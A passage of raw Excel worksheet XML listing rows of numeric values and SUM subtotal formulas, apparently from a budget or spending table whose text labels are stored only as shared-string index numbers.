        <v>0</v>
      </c>
    </row>
    <row r="1037" spans="1:6">
      <c r="A1037" s="10"/>
      <c r="B1037" s="10"/>
      <c r="C1037" s="28"/>
      <c r="D1037" s="10" t="s">
        <v>5750</v>
      </c>
      <c r="E1037" s="16" t="s">
        <v>2523</v>
      </c>
      <c r="F1037" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="1038" spans="1:6">
      <c r="A1038" s="10"/>
      <c r="B1038" s="10"/>
      <c r="C1038" s="28"/>
      <c r="D1038" s="10" t="s">
        <v>5751</v>
      </c>
      <c r="E1038" s="16" t="s">
        <v>2525</v>
      </c>
      <c r="F1038" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="1039" spans="1:6">
      <c r="A1039" s="10"/>
      <c r="B1039" s="10"/>
      <c r="C1039" s="28"/>
      <c r="D1039" s="10" t="s">
        <v>5752</v>
      </c>
      <c r="E1039" s="16" t="s">
        <v>3795</v>
      </c>
      <c r="F1039" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="1040" spans="1:6">
      <c r="A1040" s="10"/>
      <c r="B1040" s="10"/>
      <c r="C1040" s="28"/>
      <c r="D1040" s="10" t="s">
        <v>5753</v>
      </c>
      <c r="E1040" s="16" t="s">
        <v>3796</v>
      </c>
      <c r="F1040" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="1041" spans="1:6">
      <c r="A1041" s="10"/>
      <c r="B1041" s="10"/>
      <c r="C1041" s="28"/>
      <c r="D1041" s="10" t="s">
        <v>5754</v>
      </c>
      <c r="E1041" s="16" t="s">
        <v>3797</v>
      </c>
      <c r="F1041" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="1042" spans="1:6">
      <c r="A1042" s="10"/>
      <c r="B1042" s="10"/>
      <c r="C1042" s="28"/>
      <c r="D1042" s="10" t="s">
        <v>5755</v>
      </c>
      <c r="E1042" s="16" t="s">
        <v>3798</v>
      </c>
      <c r="F1042" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="1043" spans="1:6">
      <c r="A1043" s="10"/>
      <c r="B1043" s="10"/>
      <c r="C1043" s="28"/>
      <c r="D1043" s="10" t="s">
        <v>5756</v>
      </c>
      <c r="E1043" s="16" t="s">
        <v>3799</v>
      </c>
      <c r="F1043" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="1044" spans="1:6">
      <c r="A1044" s="10"/>
      <c r="B1044" s="10"/>
      <c r="C1044" s="28"/>
      <c r="D1044" s="10" t="s">
        <v>5757</v>
      </c>
      <c r="E1044" s="16" t="s">
        <v>3800</v>
      </c>
      <c r="F1044" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="1045" spans="1:6">
      <c r="A1045" s="10"/>
      <c r="B1045" s="10"/>
      <c r="C1045" s="28"/>
      <c r="D1045" s="10" t="s">
        <v>5758</v>
      </c>
      <c r="E1045" s="16" t="s">
        <v>3801</v>
      </c>
      <c r="F1045" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="1046" spans="1:6">
      <c r="A1046" s="10"/>
      <c r="B1046" s="10"/>
      <c r="C1046" s="28"/>
      <c r="D1046" s="10" t="s">
        <v>5759</v>
      </c>
      <c r="E1046" s="16" t="s">
        <v>3802</v>
      </c>
      <c r="F1046" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="1047" spans="1:6">
      <c r="A1047" s="10"/>
      <c r="B1047" s="10"/>
      <c r="C1047" s="28"/>
      <c r="D1047" s="10" t="s">
        <v>5760</v>
      </c>
      <c r="E1047" s="16" t="s">
        <v>3803</v>
      </c>
      <c r="F1047" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="1048" spans="1:6">
      <c r="A1048" s="10"/>
      <c r="B1048" s="10"/>
      <c r="C1048" s="28"/>
      <c r="D1048" s="10" t="s">
        <v>5761</v>
      </c>
      <c r="E1048" s="16" t="s">
        <v>3804</v>
      </c>
      <c r="F1048" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="1049" spans="1:6">
      <c r="A1049" s="10"/>
      <c r="B1049" s="10"/>
      <c r="C1049" s="28"/>
      <c r="D1049" s="10" t="s">
        <v>5762</v>
      </c>
      <c r="E1049" s="16" t="s">
        <v>3805</v>
      </c>
      <c r="F1049" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="1050" spans="1:6">
      <c r="A1050" s="10"/>
      <c r="B1050" s="10"/>
      <c r="C1050" s="28"/>
      <c r="D1050" s="10" t="s">
        <v>5763</v>
      </c>
      <c r="E1050" s="16" t="s">
        <v>3806</v>
      </c>
      <c r="F1050" s="17">
        <v>1746</v>
      </c>
    </row>
    <row r="1051" spans="1:6">
      <c r="A1051" s="10"/>
      <c r="B1051" s="10"/>
      <c r="C1051" s="28"/>
      <c r="D1051" s="10" t="s">
        <v>5764</v>
      </c>
      <c r="E1051" s="11" t="s">
        <v>3807</v>
      </c>
      <c r="F1051" s="12">
        <f>SUM(F1052:F1055)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1052" spans="1:6">
      <c r="A1052" s="10"/>
      <c r="B1052" s="10"/>
      <c r="C1052" s="28"/>
      <c r="D1052" s="10" t="s">
        <v>5765</v>
      </c>
      <c r="E1052" s="16" t="s">
        <v>2521</v>
      </c>
      <c r="F1052" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="1053" spans="1:6">
      <c r="A1053" s="10"/>
      <c r="B1053" s="10"/>
      <c r="C1053" s="28"/>
      <c r="D1053" s="10" t="s">
        <v>5766</v>
      </c>
      <c r="E1053" s="16" t="s">
        <v>2523</v>
      </c>
      <c r="F1053" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="1054" spans="1:6">
      <c r="A1054" s="10"/>
      <c r="B1054" s="10"/>
      <c r="C1054" s="28"/>
      <c r="D1054" s="10" t="s">
        <v>5767</v>
      </c>
      <c r="E1054" s="16" t="s">
        <v>2525</v>
      </c>
      <c r="F1054" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="1055" spans="1:6">
      <c r="A1055" s="10"/>
      <c r="B1055" s="10"/>
      <c r="C1055" s="28"/>
      <c r="D1055" s="10" t="s">
        <v>5768</v>
      </c>
      <c r="E1055" s="16" t="s">
        <v>3808</v>
      </c>
      <c r="F1055" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="1056" spans="1:6">
      <c r="A1056" s="10"/>
      <c r="B1056" s="10"/>
      <c r="C1056" s="28"/>
      <c r="D1056" s="10" t="s">
        <v>5769</v>
      </c>
      <c r="E1056" s="11" t="s">
        <v>3809</v>
      </c>
      <c r="F1056" s="12">
        <f>SUM(F1057:F1066)</f>
        <v>884</v>
      </c>
    </row>
    <row r="1057" spans="1:6">
      <c r="A1057" s="10"/>
      <c r="B1057" s="10"/>
      <c r="C1057" s="28"/>
      <c r="D1057" s="10" t="s">
        <v>5770</v>
      </c>
      <c r="E1057" s="16" t="s">
        <v>2521</v>
      </c>
      <c r="F1057" s="17">
        <v>769</v>
      </c>
    </row>
    <row r="1058" spans="1:6">
      <c r="A1058" s="10"/>
      <c r="B1058" s="10"/>
      <c r="C1058" s="28"/>
      <c r="D1058" s="10" t="s">
        <v>5771</v>
      </c>
      <c r="E1058" s="16" t="s">
        <v>2523</v>
      </c>
      <c r="F1058" s="17">
        <v>30</v>
      </c>
    </row>
    <row r="1059" spans="1:6">
      <c r="A1059" s="10"/>
      <c r="B1059" s="10"/>
      <c r="C1059" s="28"/>
      <c r="D1059" s="10" t="s">
        <v>5772</v>
      </c>
      <c r="E1059" s="16" t="s">
        <v>2525</v>
      </c>
      <c r="F1059" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="1060" spans="1:6">
      <c r="A1060" s="10"/>
      <c r="B1060" s="10"/>
      <c r="C1060" s="28"/>
      <c r="D1060" s="10" t="s">
        <v>5773</v>
      </c>
      <c r="E1060" s="16" t="s">
        <v>3810</v>
      </c>
      <c r="F1060" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="1061" spans="1:6">
      <c r="A1061" s="10"/>
      <c r="B1061" s="10"/>
      <c r="C1061" s="28"/>
      <c r="D1061" s="10" t="s">
        <v>5774</v>
      </c>
      <c r="E1061" s="16" t="s">
        <v>3811</v>
      </c>
      <c r="F1061" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="1062" spans="1:6">
      <c r="A1062" s="10"/>
      <c r="B1062" s="10"/>
      <c r="C1062" s="28"/>
      <c r="D1062" s="10" t="s">
        <v>5775</v>
      </c>
      <c r="E1062" s="16" t="s">
        <v>3812</v>
      </c>
      <c r="F1062" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="1063" spans="1:6">
      <c r="A1063" s="10"/>
      <c r="B1063" s="10"/>
      <c r="C1063" s="28"/>
      <c r="D1063" s="10" t="s">
        <v>5776</v>
      </c>
      <c r="E1063" s="16" t="s">
        <v>3813</v>
      </c>
      <c r="F1063" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="1064" spans="1:6">
      <c r="A1064" s="10"/>
      <c r="B1064" s="10"/>
      <c r="C1064" s="28"/>
      <c r="D1064" s="10" t="s">
        <v>5777</v>
      </c>
      <c r="E1064" s="16" t="s">
        <v>3814</v>
      </c>
      <c r="F1064" s="17">
        <v>41</v>
      </c>
    </row>
    <row r="1065" spans="1:6">
      <c r="A1065" s="10"/>
      <c r="B1065" s="10"/>
      <c r="C1065" s="28"/>
      <c r="D1065" s="10" t="s">
        <v>5778</v>
      </c>
      <c r="E1065" s="16" t="s">
        <v>2539</v>
      </c>
      <c r="F1065" s="33">
        <v>17</v>
      </c>
    </row>
    <row r="1066" spans="1:6">
      <c r="A1066" s="10"/>
      <c r="B1066" s="10"/>
      <c r="C1066" s="28"/>
      <c r="D1066" s="10" t="s">
        <v>5779</v>
      </c>
      <c r="E1066" s="16" t="s">
        <v>3815</v>
      </c>
      <c r="F1066" s="17">
        <v>27</v>
      </c>
    </row>
    <row r="1067" spans="1:6">
      <c r="A1067" s="10"/>
      <c r="B1067" s="10"/>
      <c r="C1067" s="28"/>
      <c r="D1067" s="10" t="s">
        <v>5780</v>
      </c>
      <c r="E1067" s="11" t="s">
        <v>3816</v>
      </c>
      <c r="F1067" s="15">
        <f>SUM(F1068:F1073)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1068" spans="1:6">
      <c r="A1068" s="10"/>
      <c r="B1068" s="10"/>
      <c r="C1068" s="28"/>
      <c r="D1068" s="10" t="s">
        <v>5781</v>
      </c>
      <c r="E1068" s="16" t="s">
        <v>2521</v>
      </c>
      <c r="F1068" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="1069" spans="1:6">
      <c r="A1069" s="10"/>
      <c r="B1069" s="10"/>
      <c r="C1069" s="28"/>
      <c r="D1069" s="10" t="s">
        <v>5782</v>
      </c>
      <c r="E1069" s="16" t="s">
        <v>2523</v>
      </c>
      <c r="F1069" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="1070" spans="1:6">
      <c r="A1070" s="10"/>
      <c r="B1070" s="10"/>
      <c r="C1070" s="28"/>
      <c r="D1070" s="10" t="s">
        <v>5783</v>
      </c>
      <c r="E1070" s="16" t="s">
        <v>2525</v>
      </c>
      <c r="F1070" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="1071" spans="1:6">
      <c r="A1071" s="10"/>
      <c r="B1071" s="10"/>
      <c r="C1071" s="28"/>
      <c r="D1071" s="10" t="s">
        <v>5784</v>
      </c>
      <c r="E1071" s="16" t="s">
        <v>3817</v>
      </c>
      <c r="F1071" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="1072" spans="1:6">
      <c r="A1072" s="10"/>
      <c r="B1072" s="10"/>
      <c r="C1072" s="28"/>
      <c r="D1072" s="10" t="s">
        <v>5785</v>
      </c>
      <c r="E1072" s="16" t="s">
        <v>3818</v>
      </c>
      <c r="F1072" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="1073" spans="1:6">
      <c r="A1073" s="10"/>
      <c r="B1073" s="10"/>
      <c r="C1073" s="28"/>
      <c r="D1073" s="10" t="s">
        <v>5786</v>
      </c>
      <c r="E1073" s="16" t="s">
        <v>3819</v>
      </c>
      <c r="F1073" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="1074" spans="1:6">
      <c r="A1074" s="10"/>
      <c r="B1074" s="10"/>
      <c r="C1074" s="28"/>
      <c r="D1074" s="10" t="s">
        <v>5787</v>
      </c>
      <c r="E1074" s="11" t="s">
        <v>3820</v>
      </c>
      <c r="F1074" s="12">
        <f>SUM(F1075:F1081)</f>
        <v>1108</v>
      </c>
    </row>
    <row r="1075" spans="1:6">
      <c r="A1075" s="10"/>
      <c r="B1075" s="10"/>
      <c r="C1075" s="28"/>
      <c r="D1075" s="10" t="s">
        <v>5788</v>
      </c>
      <c r="E1075" s="16" t="s">
        <v>2521</v>
      </c>
      <c r="F1075" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="1076" spans="1:6">
      <c r="A1076" s="10"/>
      <c r="B1076" s="10"/>
      <c r="C1076" s="28"/>
      <c r="D1076" s="10" t="s">
        <v>5789</v>
      </c>
      <c r="E1076" s="16" t="s">
        <v>2523</v>
      </c>
      <c r="F1076" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="1077" spans="1:6">
      <c r="A1077" s="10"/>
      <c r="B1077" s="10"/>
      <c r="C1077" s="28"/>
      <c r="D1077" s="10" t="s">
        <v>5790</v>
      </c>
      <c r="E1077" s="16" t="s">
        <v>2525</v>
      </c>
      <c r="F1077" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="1078" spans="1:6">
      <c r="A1078" s="10"/>
      <c r="B1078" s="10"/>
      <c r="C1078" s="28"/>
      <c r="D1078" s="10" t="s">
        <v>5791</v>
      </c>
      <c r="E1078" s="16" t="s">
        <v>3821</v>
      </c>
      <c r="F1078" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="1079" spans="1:6">
      <c r="A1079" s="10"/>
      <c r="B1079" s="10"/>
      <c r="C1079" s="28"/>
      <c r="D1079" s="10" t="s">
        <v>5792</v>
      </c>
      <c r="E1079" s="16" t="s">
        <v>3822</v>
      </c>
      <c r="F1079" s="17">
        <v>208</v>
      </c>
    </row>
    <row r="1080" spans="1:6">
      <c r="A1080" s="10"/>
      <c r="B1080" s="10"/>
      <c r="C1080" s="28"/>
      <c r="D1080" s="10" t="s">
        <v>5793</v>
      </c>
      <c r="E1080" s="16" t="s">
        <v>3823</v>
      </c>
      <c r="F1080" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="1081" spans="1:6">
      <c r="A1081" s="10"/>
      <c r="B1081" s="10"/>
      <c r="C1081" s="28"/>
      <c r="D1081" s="10" t="s">
        <v>5794</v>
      </c>
      <c r="E1081" s="16" t="s">
        <v>3824</v>
      </c>
      <c r="F1081" s="17">
        <v>900</v>
      </c>
    </row>
    <row r="1082" spans="1:6">
      <c r="A1082" s="10"/>
      <c r="B1082" s="10"/>
      <c r="C1082" s="28"/>
      <c r="D1082" s="10" t="s">
        <v>5795</v>
      </c>
      <c r="E1082" s="11" t="s">
        <v>3825</v>
      </c>
      <c r="F1082" s="12">
        <f>SUM(F1083:F1087)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1083" spans="1:6">
      <c r="A1083" s="10"/>
      <c r="B1083" s="10"/>
      <c r="C1083" s="28"/>
      <c r="D1083" s="10" t="s">
        <v>5796</v>
      </c>
      <c r="E1083" s="16" t="s">
        <v>3826</v>
      </c>
      <c r="F1083" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="1084" spans="1:6">
      <c r="A1084" s="10"/>
      <c r="B1084" s="10"/>
      <c r="C1084" s="28"/>
      <c r="D1084" s="10" t="s">
        <v>5797</v>
      </c>
      <c r="E1084" s="16" t="s">
        <v>3827</v>
      </c>
      <c r="F1084" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="1085" spans="1:6">
      <c r="A1085" s="10"/>
      <c r="B1085" s="10"/>
      <c r="C1085" s="28"/>
      <c r="D1085" s="10" t="s">
        <v>5798</v>
      </c>
      <c r="E1085" s="16" t="s">
        <v>3828</v>
      </c>
      <c r="F1085" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="1086" spans="1:6">
      <c r="A1086" s="10"/>
      <c r="B1086" s="10"/>
      <c r="C1086" s="28"/>
      <c r="D1086" s="10" t="s">
        <v>5799</v>
      </c>
      <c r="E1086" s="16" t="s">
        <v>3829</v>
      </c>
      <c r="F1086" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="1087" spans="1:6">
      <c r="A1087" s="10"/>
      <c r="B1087" s="10"/>
      <c r="C1087" s="28"/>
      <c r="D1087" s="10" t="s">
        <v>5800</v>
      </c>
      <c r="E1087" s="16" t="s">
        <v>3830</v>
      </c>
      <c r="F1087" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="1088" spans="1:6">
      <c r="A1088" s="10"/>
      <c r="B1088" s="10"/>
      <c r="C1088" s="28"/>
      <c r="D1088" s="10" t="s">
        <v>5801</v>
      </c>
      <c r="E1088" s="11" t="s">
        <v>3831</v>
      </c>
      <c r="F1088" s="12">
        <f>F1089+F1099+F1105</f>
        <v>759</v>
      </c>
    </row>
    <row r="1089" spans="1:6">
      <c r="A1089" s="10"/>
      <c r="B1089" s="10"/>
      <c r="C1089" s="28"/>
      <c r="D1089" s="10" t="s">
        <v>5802</v>
      </c>
      <c r="E1089" s="11" t="s">
        <v>3832</v>
      </c>
      <c r="F1089" s="12">
        <f>SUM(F1090:F1098)</f>
        <v>357</v>
      </c>
    </row>
    <row r="1090" spans="1:6">
      <c r="A1090" s="10"/>
      <c r="B1090" s="10"/>
      <c r="C1090" s="28"/>
      <c r="D1090" s="10" t="s">
        <v>5803</v>
      </c>
      <c r="E1090" s="16" t="s">
        <v>2521</v>
      </c>
      <c r="F1090" s="17">
        <v>216</v>
      </c>
    </row>
    <row r="1091" spans="1:6">
      <c r="A1091" s="10"/>
      <c r="B1091" s="10"/>
      <c r="C1091" s="28"/>
      <c r="D1091" s="10" t="s">
        <v>5804</v>
      </c>
      <c r="E1091" s="16" t="s">
        <v>2523</v>
      </c>
      <c r="F1091" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="1092" spans="1:6">
      <c r="A1092" s="10"/>
      <c r="B1092" s="10"/>
      <c r="C1092" s="28"/>
      <c r="D1092" s="10" t="s">
        <v>5805</v>
      </c>
      <c r="E1092" s="16" t="s">
        <v>2525</v>
      </c>
      <c r="F1092" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="1093" spans="1:6">
      <c r="A1093" s="10"/>
      <c r="B1093" s="10"/>
      <c r="C1093" s="28"/>
      <c r="D1093" s="10" t="s">
        <v>5806</v>
      </c>
      <c r="E1093" s="16" t="s">
        <v>3833</v>
      </c>
      <c r="F1093" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="1094" spans="1:6">
      <c r="A1094" s="10"/>
      <c r="B1094" s="10"/>
      <c r="C1094" s="28"/>
      <c r="D1094" s="10" t="s">
        <v>5807</v>
      </c>
      <c r="E1094" s="16" t="s">
        <v>3834</v>
      </c>
      <c r="F1094" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="1095" spans="1:6">
      <c r="A1095" s="10"/>
      <c r="B1095" s="10"/>
      <c r="C1095" s="28"/>
      <c r="D1095" s="10" t="s">
        <v>5808</v>
      </c>
      <c r="E1095" s="16" t="s">
        <v>3835</v>
      </c>
      <c r="F1095" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="1096" spans="1:6">
      <c r="A1096" s="10"/>
      <c r="B1096" s="10"/>
      <c r="C1096" s="28"/>
      <c r="D1096" s="10" t="s">
        <v>5809</v>
      </c>
      <c r="E1096" s="16" t="s">
        <v>3836</v>
      </c>
      <c r="F1096" s="17">
        <v>45</v>
      </c>
    </row>
    <row r="1097" spans="1:6">
      <c r="A1097" s="10"/>
      <c r="B1097" s="10"/>
      <c r="C1097" s="28"/>
      <c r="D1097" s="10" t="s">
        <v>5810</v>
      </c>
      <c r="E1097" s="16" t="s">
        <v>2539</v>
      </c>
      <c r="F1097" s="17">
        <v>14</v>
      </c>
    </row>
    <row r="1098" spans="1:6">
      <c r="A1098" s="10"/>
      <c r="B1098" s="10"/>
      <c r="C1098" s="28"/>
      <c r="D1098" s="10" t="s">
        <v>5811</v>
      </c>
      <c r="E1098" s="16" t="s">
        <v>3837</v>
      </c>
      <c r="F1098" s="17">
        <v>82</v>
      </c>
    </row>
    <row r="1099" spans="1:6">
      <c r="A1099" s="10"/>
      <c r="B1099" s="10"/>
      <c r="C1099" s="28"/>
      <c r="D1099" s="10" t="s">
        <v>5812</v>
      </c>
      <c r="E1099" s="11" t="s">
        <v>3838</v>
      </c>
      <c r="F1099" s="12">
        <f>SUM(F1100:F1104)</f>
        <v>252</v>
      </c>
    </row>
    <row r="1100" spans="1:6">
      <c r="A1100" s="10"/>
      <c r="B1100" s="10"/>
      <c r="C1100" s="28"/>
      <c r="D1100" s="10" t="s">
        <v>5813</v>
      </c>
      <c r="E1100" s="16" t="s">
        <v>2521</v>
      </c>
      <c r="F1100" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="1101" spans="1:6">
      <c r="A1101" s="10"/>
      <c r="B1101" s="10"/>
      <c r="C1101" s="28"/>
      <c r="D1101" s="10" t="s">
        <v>5814</v>
      </c>
      <c r="E1101" s="16" t="s">
        <v>2523</v>
      </c>
      <c r="F1101" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="1102" spans="1:6">
      <c r="A1102" s="10"/>
      <c r="B1102" s="10"/>
      <c r="C1102" s="28"/>
      <c r="D1102" s="10" t="s">
        <v>5815</v>
      </c>
      <c r="E1102" s="16" t="s">
        <v>2525</v>
      </c>
      <c r="F1102" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="1103" spans="1:6">
      <c r="A1103" s="10"/>
      <c r="B1103" s="10"/>
      <c r="C1103" s="28"/>
      <c r="D1103" s="10" t="s">
        <v>5816</v>
      </c>
      <c r="E1103" s="16" t="s">
        <v>3839</v>
      </c>
      <c r="F1103" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="1104" spans="1:6">
      <c r="A1104" s="10"/>
      <c r="B1104" s="10"/>
      <c r="C1104" s="28"/>
      <c r="D1104" s="10" t="s">
        <v>5817</v>
      </c>
      <c r="E1104" s="16" t="s">
        <v>3840</v>
      </c>
      <c r="F1104" s="17">
        <v>252</v>
      </c>
    </row>
    <row r="1105" spans="1:6">
      <c r="A1105" s="10"/>
      <c r="B1105" s="10"/>
      <c r="C1105" s="28"/>
      <c r="D1105" s="10" t="s">
        <v>5818</v>
      </c>
      <c r="E1105" s="11" t="s">
        <v>3841</v>
      </c>
      <c r="F1105" s="12">
        <f>SUM(F1106:F1107)</f>
        <v>150</v>
      </c>
    </row>
    <row r="1106" spans="1:6">
      <c r="A1106" s="10"/>
      <c r="B1106" s="10"/>
      <c r="C1106" s="28"/>
      <c r="D1106" s="10" t="s">
        <v>5819</v>
      </c>
      <c r="E1106" s="16" t="s">
        <v>3842</v>
      </c>
      <c r="F1106" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="1107" spans="1:6">
      <c r="A1107" s="10"/>
      <c r="B1107" s="10"/>
      <c r="C1107" s="28"/>
      <c r="D1107" s="10" t="s">
        <v>5820</v>
      </c>
      <c r="E1107" s="16" t="s">
        <v>3843</v>
      </c>
      <c r="F1107" s="17">
        <v>150</v>
      </c>
    </row>
    <row r="1108" spans="1:6">
      <c r="A1108" s="10"/>
      <c r="B1108" s="10"/>
      <c r="C1108" s="28"/>
      <c r="D1108" s="10" t="s">
        <v>5821</v>
      </c>
      <c r="E1108" s="11" t="s">
        <v>3844</v>
      </c>
      <c r="F1108" s="12">
        <f>F1109+F1116+F1126+F1132+F1135</f>
        <v>178</v>
      </c>
    </row>
    <row r="1109" spans="1:6">
      <c r="A1109" s="10"/>
      <c r="B1109" s="10"/>
      <c r="C1109" s="28"/>
      <c r="D1109" s="10" t="s">
        <v>5822</v>
      </c>
      <c r="E1109" s="11" t="s">
        <v>3845</v>
      </c>
      <c r="F1109" s="12">
        <f>SUM(F1110:F1115)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1110" spans="1:6">
      <c r="A1110" s="10"/>
      <c r="B1110" s="10"/>
      <c r="C1110" s="28"/>
      <c r="D1110" s="10" t="s">
        <v>5823</v>
      </c>
      <c r="E1110" s="16" t="s">
        <v>2521</v>
      </c>
      <c r="F1110" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="1111" spans="1:6">
      <c r="A1111" s="10"/>
      <c r="B1111" s="10"/>
      <c r="C1111" s="28"/>
      <c r="D1111" s="10" t="s">
        <v>5824</v>
      </c>
      <c r="E1111" s="16" t="s">
        <v>2523</v>
      </c>
      <c r="F1111" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="1112" spans="1:6">
      <c r="A1112" s="10"/>
      <c r="B1112" s="10"/>
      <c r="C1112" s="28"/>
      <c r="D1112" s="10" t="s">
        <v>5825</v>
      </c>
      <c r="E1112" s="16" t="s">
        <v>2525</v>
      </c>
      <c r="F1112" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="1113" spans="1:6">
      <c r="A1113" s="10"/>
      <c r="B1113" s="10"/>
      <c r="C1113" s="28"/>
      <c r="D1113" s="10" t="s">
        <v>5826</v>
      </c>
      <c r="E1113" s="16" t="s">
        <v>3846</v>
      </c>
      <c r="F1113" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="1114" spans="1:6">
      <c r="A1114" s="10"/>
      <c r="B1114" s="10"/>
      <c r="C1114" s="28"/>
      <c r="D1114" s="10" t="s">
        <v>5827</v>
      </c>
      <c r="E1114" s="16" t="s">
        <v>2539</v>
      </c>
      <c r="F1114" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="1115" spans="1:6">
      <c r="A1115" s="10"/>
      <c r="B1115" s="10"/>
      <c r="C1115" s="28"/>
      <c r="D1115" s="10" t="s">
        <v>5828</v>
      </c>
      <c r="E1115" s="16" t="s">
        <v>3847</v>
      </c>
      <c r="F1115" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="1116" spans="1:6">
      <c r="A1116" s="10"/>
      <c r="B1116" s="10"/>
      <c r="C1116" s="28"/>
      <c r="D1116" s="10" t="s">
        <v>5829</v>
      </c>
      <c r="E1116" s="11" t="s">
        <v>3848</v>
      </c>
      <c r="F1116" s="12">
        <f>SUM(F1117:F1125)</f>
        <v>95</v>
      </c>
    </row>
    <row r="1117" spans="1:6">
      <c r="A1117" s="10"/>
      <c r="B1117" s="10"/>
      <c r="C1117" s="28"/>
      <c r="D1117" s="10" t="s">
        <v>5830</v>
      </c>
      <c r="E1117" s="16" t="s">
        <v>3849</v>
      </c>
      <c r="F1117" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="1118" spans="1:6">
      <c r="A1118" s="10"/>
      <c r="B1118" s="10"/>
      <c r="C1118" s="28"/>
      <c r="D1118" s="10" t="s">
        <v>5831</v>
      </c>
      <c r="E1118" s="16" t="s">
        <v>3850</v>
      </c>
      <c r="F1118" s="17">
        <v>95</v>
      </c>
    </row>
    <row r="1119" spans="1:6">
      <c r="A1119" s="10"/>
      <c r="B1119" s="10"/>
      <c r="C1119" s="28"/>
      <c r="D1119" s="10" t="s">
        <v>5832</v>
      </c>
      <c r="E1119" s="16" t="s">
        <v>3851</v>
      </c>
      <c r="F1119" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="1120" spans="1:6">
      <c r="A1120" s="10"/>
      <c r="B1120" s="10"/>
      <c r="C1120" s="28"/>
      <c r="D1120" s="10" t="s">
        <v>5833</v>
      </c>
      <c r="E1120" s="16" t="s">
        <v>3852</v>
      </c>
      <c r="F1120" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="1121" spans="1:6">
      <c r="A1121" s="10"/>
      <c r="B1121" s="10"/>
      <c r="C1121" s="28"/>
      <c r="D1121" s="10" t="s">
        <v>5834</v>
      </c>
      <c r="E1121" s="16" t="s">
        <v>3853</v>
      </c>
      <c r="F1121" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="1122" spans="1:6">
      <c r="A1122" s="10"/>
      <c r="B1122" s="10"/>
      <c r="C1122" s="28"/>
      <c r="D1122" s="10" t="s">
        <v>5835</v>
      </c>
      <c r="E1122" s="16" t="s">
        <v>3854</v>
      </c>
      <c r="F1122" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="1123" spans="1:6">
      <c r="A1123" s="10"/>
      <c r="B1123" s="10"/>
      <c r="C1123" s="28"/>
      <c r="D1123" s="10" t="s">
        <v>5836</v>
      </c>
      <c r="E1123" s="16" t="s">
        <v>3855</v>
      </c>
      <c r="F1123" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="1124" spans="1:6">
      <c r="A1124" s="10"/>
      <c r="B1124" s="10"/>
      <c r="C1124" s="28"/>
      <c r="D1124" s="10" t="s">
        <v>5837</v>
      </c>
      <c r="E1124" s="16" t="s">
        <v>3856</v>
      </c>
      <c r="F1124" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="1125" spans="1:6">
      <c r="A1125" s="10"/>
      <c r="B1125" s="10"/>
      <c r="C1125" s="28"/>
      <c r="D1125" s="10" t="s">
        <v>5838</v>
      </c>
      <c r="E1125" s="16" t="s">
        <v>3857</v>
      </c>
      <c r="F1125" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="1126" spans="1:6">
      <c r="A1126" s="10"/>
      <c r="B1126" s="10"/>
      <c r="C1126" s="28"/>
      <c r="D1126" s="10" t="s">
        <v>5839</v>
      </c>
      <c r="E1126" s="11" t="s">
        <v>3858</v>
      </c>
      <c r="F1126" s="12">
        <f>SUM(F1127:F1131)</f>
        <v>48</v>
      </c>
    </row>
    <row r="1127" spans="1:6">
      <c r="A1127" s="10"/>
